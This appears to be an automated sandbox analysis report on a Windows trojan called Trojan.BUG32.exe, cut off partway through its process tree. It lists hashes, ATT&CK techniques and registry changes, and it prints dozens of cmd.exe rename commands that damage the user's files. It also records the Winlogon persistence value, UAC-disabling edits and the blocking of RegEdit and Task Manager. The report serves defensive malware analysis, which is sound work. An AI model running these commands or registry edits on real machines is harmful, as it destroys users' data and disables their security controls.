fab74fe6b288e4de3ffc2ad3794438671ae23ed9c69f6f28ce5baea1e7a07123

Analysis

max time kernel
20s
max time network
60s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
17-08-2024 06:29

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Trojan.BUG32.exe
Size

3.0MB
MD5

149cc2ec1900cb778afb50d8026eadf5
SHA1

a7bc1bbc7bdc970757ec369ef0b51dc53989f131
SHA256

817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797
SHA512

d617654478beb6325d86c108cddaff8f8d658a235d26b8e0282ed85dca826bdb62b0b67e749c7cd421dbae1d98084220e2f4d5779badb8fd7ab07ff333a35553
SSDEEP

49152:Or2U5IahDUGN97rkqOAackLjQ0rZEAh3oA6wHE+K60Kk0aCLkfAZKt0OJTcL:4H2ahFNNrg3QbQoA6wHEnFN4IJu

Score

10^/10

credential_access defense_evasion discovery evasion persistence privilege_escalation ransomware spyware stealer trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\bug32\\runner.vbs\""	wscript.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Renames multiple (279) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools = "1"	wscript.exe

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	Trojan.BUG32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	wscript.exe

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico"	wscript.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 20 IoCs

description	ioc	Process
File created	C:\Users\Admin\Contacts\desktop.ini	wscript.exe
File created	C:\Users\Admin\Favorites\desktop.ini	wscript.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	wmplayer.exe
File created	C:\Users\Admin\Downloads\desktop.ini	wscript.exe
File created	C:\Users\Admin\Music\desktop.ini	wscript.exe
File created	C:\Users\Admin\OneDrive\desktop.ini	wscript.exe
File created	C:\Users\Admin\Saved Games\desktop.ini	wscript.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	wmplayer.exe
File created	C:\Users\Admin\Documents\desktop.ini	wscript.exe
File created	C:\Users\Admin\Links\desktop.ini	wscript.exe
File created	C:\Users\Admin\Pictures\desktop.ini	wscript.exe
File created	C:\Users\Admin\Searches\desktop.ini	wscript.exe
File created	C:\Users\Admin\Videos\desktop.ini	wscript.exe
File created	C:\Users\Admin\3D Objects\desktop.ini	wscript.exe
File created	C:\Users\Admin\Desktop\desktop.ini	wscript.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	wmplayer.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	wmplayer.exe
File opened (read-only)	\??\O:	wmplayer.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\M:	unregmp2.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\H:	wmplayer.exe
File opened (read-only)	\??\I:	wmplayer.exe
File opened (read-only)	\??\P:	wmplayer.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\R:	wmplayer.exe
File opened (read-only)	\??\X:	wmplayer.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\E:	wmplayer.exe
File opened (read-only)	\??\S:	wmplayer.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\A:	wmplayer.exe
File opened (read-only)	\??\G:	wmplayer.exe
File opened (read-only)	\??\N:	wmplayer.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\B:	wmplayer.exe
File opened (read-only)	\??\M:	wmplayer.exe
File opened (read-only)	\??\T:	wmplayer.exe
File opened (read-only)	\??\U:	wmplayer.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\V:	wmplayer.exe
File opened (read-only)	\??\L:	wmplayer.exe
File opened (read-only)	\??\Q:	wmplayer.exe
File opened (read-only)	\??\K:	wmplayer.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\W:	wmplayer.exe
File opened (read-only)	\??\Y:	wmplayer.exe
File opened (read-only)	\??\Z:	wmplayer.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
1500	wscript.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan.BUG32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmplayer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unregmp2.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2928	cmd.exe
3992	Process not Found
1680	Process not Found
1724	Process not Found

Modifies Control Panel 4 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\Cursors	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\Cursors\Arrow = "C:\\bug32\\bx.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\Cursors\AppStarting = "C:\\bug32\\bx.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\Cursors\Hand = "C:\\bug32\\bx.cur"	wscript.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico"	wscript.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1500	wscript.exe
3380	wmplayer.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
4388	cmd.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4448	unregmp2.exe
Token: SeCreatePagefilePrivilege	4448	unregmp2.exe
Token: SeShutdownPrivilege	3380	wmplayer.exe
Token: SeCreatePagefilePrivilege	3380	wmplayer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3380	wmplayer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3108 wrote to memory of 3304	3108	Trojan.BUG32.exe	86
PID 3108 wrote to memory of 3304	3108	Trojan.BUG32.exe	86
PID 3304 wrote to memory of 2328	3304	wscript.exe	89
PID 3304 wrote to memory of 2328	3304	wscript.exe	89
PID 2328 wrote to memory of 1500	2328	wscript.exe	90
PID 2328 wrote to memory of 1500	2328	wscript.exe	90
PID 1500 wrote to memory of 3380	1500	wscript.exe	91
PID 1500 wrote to memory of 3380	1500	wscript.exe	91
PID 1500 wrote to memory of 3380	1500	wscript.exe	91
PID 1500 wrote to memory of 1644	1500	wscript.exe	92
PID 1500 wrote to memory of 1644	1500	wscript.exe	92
PID 3380 wrote to memory of 1532	3380	wmplayer.exe	94
PID 3380 wrote to memory of 1532	3380	wmplayer.exe	94
PID 3380 wrote to memory of 1532	3380	wmplayer.exe	94
PID 1532 wrote to memory of 4448	1532	unregmp2.exe	95
PID 1532 wrote to memory of 4448	1532	unregmp2.exe	95
PID 1500 wrote to memory of 4400	1500	wscript.exe	338
PID 1500 wrote to memory of 4400	1500	wscript.exe	338
PID 1500 wrote to memory of 4288	1500	wscript.exe	101
PID 1500 wrote to memory of 4288	1500	wscript.exe	101
PID 1500 wrote to memory of 2872	1500	wscript.exe	103
PID 1500 wrote to memory of 2872	1500	wscript.exe	103
PID 1500 wrote to memory of 2000	1500	wscript.exe	505
PID 1500 wrote to memory of 2000	1500	wscript.exe	505
PID 1500 wrote to memory of 4932	1500	wscript.exe	508
PID 1500 wrote to memory of 4932	1500	wscript.exe	508
PID 1500 wrote to memory of 464	1500	wscript.exe	142
PID 1500 wrote to memory of 464	1500	wscript.exe	142
PID 1500 wrote to memory of 4796	1500	wscript.exe	112
PID 1500 wrote to memory of 4796	1500	wscript.exe	112
PID 1500 wrote to memory of 2852	1500	wscript.exe	154
PID 1500 wrote to memory of 2852	1500	wscript.exe	154
PID 1500 wrote to memory of 4840	1500	wscript.exe	373
PID 1500 wrote to memory of 4840	1500	wscript.exe	373
PID 1500 wrote to memory of 1628	1500	wscript.exe	241
PID 1500 wrote to memory of 1628	1500	wscript.exe	241
PID 1500 wrote to memory of 2628	1500	wscript.exe	507
PID 1500 wrote to memory of 2628	1500	wscript.exe	507
PID 1500 wrote to memory of 2476	1500	wscript.exe	123
PID 1500 wrote to memory of 2476	1500	wscript.exe	123
PID 1500 wrote to memory of 1888	1500	wscript.exe	340
PID 1500 wrote to memory of 1888	1500	wscript.exe	340
PID 1500 wrote to memory of 1316	1500	wscript.exe	622
PID 1500 wrote to memory of 1316	1500	wscript.exe	622
PID 1500 wrote to memory of 4620	1500	wscript.exe	586
PID 1500 wrote to memory of 4620	1500	wscript.exe	586
PID 1500 wrote to memory of 3344	1500	wscript.exe	535
PID 1500 wrote to memory of 3344	1500	wscript.exe	535
PID 1500 wrote to memory of 3084	1500	wscript.exe	585
PID 1500 wrote to memory of 3084	1500	wscript.exe	585
PID 1500 wrote to memory of 2992	1500	wscript.exe	234
PID 1500 wrote to memory of 2992	1500	wscript.exe	234
PID 1500 wrote to memory of 4708	1500	wscript.exe	394
PID 1500 wrote to memory of 4708	1500	wscript.exe	394
PID 1500 wrote to memory of 4812	1500	wscript.exe	437
PID 1500 wrote to memory of 4812	1500	wscript.exe	437
PID 1500 wrote to memory of 964	1500	wscript.exe	272
PID 1500 wrote to memory of 964	1500	wscript.exe	272
PID 1500 wrote to memory of 4408	1500	wscript.exe	143
PID 1500 wrote to memory of 4408	1500	wscript.exe	143
PID 1500 wrote to memory of 4784	1500	wscript.exe	473
PID 1500 wrote to memory of 4784	1500	wscript.exe	473
PID 1500 wrote to memory of 2788	1500	wscript.exe	702
PID 1500 wrote to memory of 2788	1500	wscript.exe	702

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4368	Process not Found

C:\Users\Admin\AppData\Local\Temp\Trojan.BUG32.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.BUG32.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3108
- C:\Windows\system32\wscript.exe
  "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\6580.tmp\6581.vbs
  2⤵
  - UAC bypass
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:3304
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2328
  - - C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator
      4⤵
      Modifies WinLogon for persistence
      UAC bypass
      Disables RegEdit via registry modification
      Checks computer location settings
      Modifies system executable filetype association
      Drops desktop.ini file(s)
      Access Token Manipulation: Create Process with Token
      Modifies Control Panel
      Modifies registry class
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:1500
    - - C:\Program Files (x86)\Windows Media Player\wmplayer.exe
        
        "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
        5⤵
        Drops desktop.ini file(s)
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3380
      - C:\Windows\SysWOW64\unregmp2.exe
        
        "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1532
        
        C:\Windows\system32\unregmp2.exe
        
        "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
        7⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        
        PID:4448
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c dir "C:\Users\Admin\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"
        5⤵
        
        PID:1644
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\3D Objects\*.*" "*.exe"
        5⤵
        
        PID:4400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\*.*" "*.exe"
        5⤵
        
        PID:4288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Application Data\*.*" "*.exe"
        5⤵
        
        PID:2872
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Contacts\*.*" "*.exe"
        5⤵
        
        PID:2000
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Cookies\*.*" "*.exe"
        5⤵
        
        PID:4932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Desktop\*.*" "*.exe"
        5⤵
        
        PID:464
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\*.*" "*.exe"
        5⤵
        
        PID:4796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Downloads\*.*" "*.exe"
        5⤵
        
        PID:2852
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\*.*" "*.exe"
        5⤵
        
        PID:4840
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Links\*.*" "*.exe"
        5⤵
        
        PID:1628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Local Settings\*.*" "*.exe"
        5⤵
        
        PID:2628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Music\*.*" "*.exe"
        5⤵
        
        PID:2476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\My Documents\*.*" "*.exe"
        5⤵
        
        PID:1888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\NetHood\*.*" "*.exe"
        5⤵
        
        PID:1316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\OneDrive\*.*" "*.exe"
        5⤵
        
        PID:4620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Pictures\*.*" "*.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\PrintHood\*.*" "*.exe"
        5⤵
        
        PID:3084
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Recent\*.*" "*.exe"
        5⤵
        
        PID:2992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Saved Games\*.*" "*.exe"
        5⤵
        
        PID:4708
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Searches\*.*" "*.exe"
        5⤵
        
        PID:4812
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\SendTo\*.*" "*.exe"
        5⤵
        
        PID:964
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:464
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Start Menu\*.*" "*.exe"
        5⤵
        
        PID:4408
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Templates\*.*" "*.exe"
        5⤵
        
        PID:4784
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Videos\*.*" "*.exe"
        5⤵
        
        PID:2788
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\*.*" "*.exe"
        5⤵
        
        PID:3648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\*.*" "*.exe"
        5⤵
        
        PID:680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\*.*" "*.exe"
        5⤵
        
        PID:1628
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2852
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\*.*" "*.exe"
        5⤵
        
        PID:2932
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Application Data\*.*" "*.exe"
        5⤵
        
        PID:1776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\*.*" "*.exe"
        5⤵
        
        PID:1844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\*.*" "*.exe"
        5⤵
        
        PID:3560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\*.*" "*.exe"
        5⤵
        
        PID:2116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\History\*.*" "*.exe"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\*.*" "*.exe"
        5⤵
        
        PID:4880
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\*.*" "*.exe"
        5⤵
        
        PID:3616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\*.*" "*.exe"
        5⤵
        
        PID:1536
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\PeerDistRepub\*.*" "*.exe"
        5⤵
        
        PID:3972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\PlaceholderTileLogoFolder\*.*" "*.exe"
        5⤵
        
        PID:1272
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Publishers\*.*" "*.exe"
        5⤵
        
        PID:1052
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\*.*" "*.exe"
        5⤵
        Suspicious behavior: RenamesItself
        
        PID:4388
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temporary Internet Files\*.*" "*.exe"
        5⤵
        
        PID:2748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\*.*" "*.exe"
        5⤵
        
        PID:3648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\*.*" "*.exe"
        5⤵
        
        PID:4800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\*.*" "*.exe"
        5⤵
        
        PID:1816
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\Cache\*.*" "*.exe"
        5⤵
        
        PID:4132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\*.*" "*.exe"
        5⤵
        
        PID:1844
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe"
        5⤵
        
        PID:3560
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\*.*" "*.exe"
        5⤵
        
        PID:2176
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\*.*" "*.exe"
        5⤵
        
        PID:3644
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\*.*" "*.exe"
        5⤵
        
        PID:3784
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\temp\*.*" "*.exe"
        5⤵
        
        PID:1292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\*.*" "*.exe"
        5⤵
        
        PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\*.*" "*.exe"
        5⤵
        
        PID:3916
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\*.*" "*.exe"
        5⤵
        
        PID:3804
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates\*.*" "*.exe"
        5⤵
        
        PID:1620
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\*.*" "*.exe"
        5⤵
        
        PID:5076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation\*.*" "*.exe"
        5⤵
        
        PID:1612
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\*.*" "*.exe"
        5⤵
        
        PID:3696
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny\*.*" "*.exe"
        5⤵
        
        PID:836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\*.*" "*.exe"
        5⤵
        
        PID:680
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies\*.*" "*.exe"
        5⤵
        
        PID:3484
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\*.*" "*.exe"
        5⤵
        
        PID:3016
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\*.*" "*.exe"
        5⤵
        
        PID:812
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\*.*" "*.exe"
        5⤵
        
        PID:2900
    - - C:\Windows\System32\cmd.exe
        
